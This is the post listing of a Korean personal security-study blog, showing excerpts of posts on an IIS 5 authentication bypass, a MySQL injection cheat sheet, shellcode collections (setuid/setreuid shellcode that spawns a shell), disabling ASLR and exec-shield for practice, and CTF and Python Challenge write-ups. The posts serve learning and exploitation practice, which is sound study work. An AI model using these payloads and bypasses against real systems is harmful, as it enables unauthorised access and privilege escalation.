ByJJoon's Lab

[작성자:] ByJJoon

  • Microsoft Internet Information Services 5 Authentication Bypass Vulnerability

    Description:This vulnerability is because of using Alternate Data Stream to open a protected folder. All of IISauthentication methods can be circumvented. In this technique, we can add a “:$i30:$INDEX_ALLOCATION” to a directory name to bypass the authentication.Download: http://www.exploit-db.com/sploits/IIS5.1_Authentication_Bypass.pdf

  • 난독화 스크립트 확인 팁

    난독화 된 스크립트 복호화 시 alert 창을 띄워서 확인도 가능하지만 아래와 같이 textarea를 이용하여 확인도 가능하다. <form name="TEST"> <textarea name="TEST" cols="100" rows="100"> </textarea> </form> TEST.TEST.value = 문자열; 추가로 파일에 기록해야 할 필요가 있을 경우 아래와 같이 함수를 작성하여 사용하면 된다. function filewriter(text) { var fileObject = new ActiveXObject("Scripting.FileSystemObject"); fWrite = fileObject.CreateTextFile("C:\Users\ByJJoon\Downloads\1.txt", true); fWrite.write(text); fWrite.close(); }

  • MySQL Injection Cheat Sheet

    MySQL Injection Cheat Sheet 1. Basics. SELECT * FROM login /* foobar */ SELECT * FROM login WHERE id = 1 or 1=1 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%" 2. Variations. SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 SELECT * FROM login WHE/**/RE id […]

  • Codegate 2010 – Challenge 7 풀이

    패킷 덤프 파일이 주어지고 SSL 관련 문제를 푸는 문제가 많이 보인다. 이런 문제들은 접해본 경험이 없어 풀이를 보고 따라 푸는 것으로 이해하는 수 밖에… 🙁 이제 풀이를 시작해 보도록 하자. 우선 해당 패킷에서 공개키 부분을 추출하도록 한다. 추출을 한 후 아래와 같이 OpenSSL을 이용하여 어떤 알고리즘으로 되어 있는지 확인할 수 있다. C:\Users\ByJJoon\Downloads>openssl.exe x509 -inform DER […]

  • Windows에서 Scapy 사용 환경 구성

    python 설치 – http://www.python.org Scapy 설치 – http://www.secdev.org/projects/scapy/ pywin32 설치 – http://python.net/crew/mhammond/win32/Downloads.html Winpcap 설치 – http://www.winpcap.org/ pypcap 설치 – http://code.google.com/p/pypcap/ libdnet 설치 – http://code.google.com/p/libdnet/ pyreadline 설치 – http://ipython.scipy.org/moin/PyReadline/Intro pycrypto 설치 – http://www.voidspace.org.uk/python/modules.shtml#pycrypto M2Crypto 설치 – http://chandlerproject.org/Projects/MeTooCrypto#Downloads 출처 : http://www.secdev.org/projects/scapy/doc/installation.html#windows

  • RTL(Returning into libc) 스터디 – 2

    문제 환경은 아래와 같습니다. [byjjoon@ByJJoon RTL]$ cat /etc/redhat-release Fedora release 9 (Sulphur) [byjjoon@ByJJoon RTL]$ sysctl -a | grep random -bash: sysctl: command not found [byjjoon@ByJJoon RTL]$ /sbin/sysctl -a | grep random error: permission denied on key 'kernel.cad_pid' kernel.random.poolsize = 4096 kernel.random.entropy_avail = 606 kernel.random.read_wakeup_threshold = 64 kernel.random.write_wakeup_threshold = 128 kernel.random.boot_id = aa842921-f1e2-416e-8a72-240fa7054ae5 kernel.random.uuid = 0f6a6b7f-11ed-4ba4-8b27-94cfbe6b62bb […]

  • System 문제 환경 확인 및 설정

    [랜덤 스택&라이브러리, 스택 실행권한 설정]커널 2.6 부터 제공 (Default 값은 1)# sysctl -w kernel.randomize_va_space=0 (해제)# sysctl -w kernel.randomize_va_space=1 (랜덤 스택 & 라이브러리)# sysctl -w kernel.randomize_va_space=2 (랜럼 스택 & 라이브러리 & 힙)# sysctl -w kernel.exec-shield=0 (스택 실행권한 해제)# sysctl -w kernel.exec-shield=1 (스택 실행권한 설정)시스템 시작할때 자동으로 설정하기위에 설정 명령을 /etc/sysctl.conf 안에 쓴 후 reboot [랜덤 스택&라이브러리, 스택 […]

  • Adobe 0-day vulnerability in Flash, Adobe Reader and Acrobat (CVE-2010-1297)

  • Shellcode 모음

    uid, gid 설정 및 실행 파일 설정 char shellcode[] = "\x31\xc0\xb0\x46\x66\xbb\x66\x02\x66\xb9\x66\x02\xcd\x80" // uid 614 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/go"; // /tmp/go 실행 int main() { printf("Length: %d bytes.\n'", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } Universal setreuid() shellcode (출처 : http://hkpco.kr/paper/universal%20setreuid%20shellcode.txt) char shellcode[] = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80" // setreuid( geteuid() , geteuid() ); "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"; // shellcode int main() { printf("Length: […]

  • The Python Challenge – Level 24

    http://www.pythonchallenge.com/pc/hex/ambiguity.html 접속을 하면 아래와 같인 미로 이미지가 나온다. 오른쪽 상단을 입구로 해서 왼쪽 하단의 출구로 나가는 미로찾기를 작성해야 하는 것으로 보인다. 미로찾기 알고리즘은 여러 알고리즘이 있으나 가장 간단한 좌수법(왼손으로 벽짚고 따라가기) 으로 작성하여 보았다. 좌수법의 알고리즘 원리는 아래와 같다. 1. 왼쪽이 비어있으면 왼쪽으로 먼저 간다. 2. 왼쪽이 막혀있고 위쪽이 비어있으면 위쪽으로 간다. 3. 왼쪽, 위쪽이 […]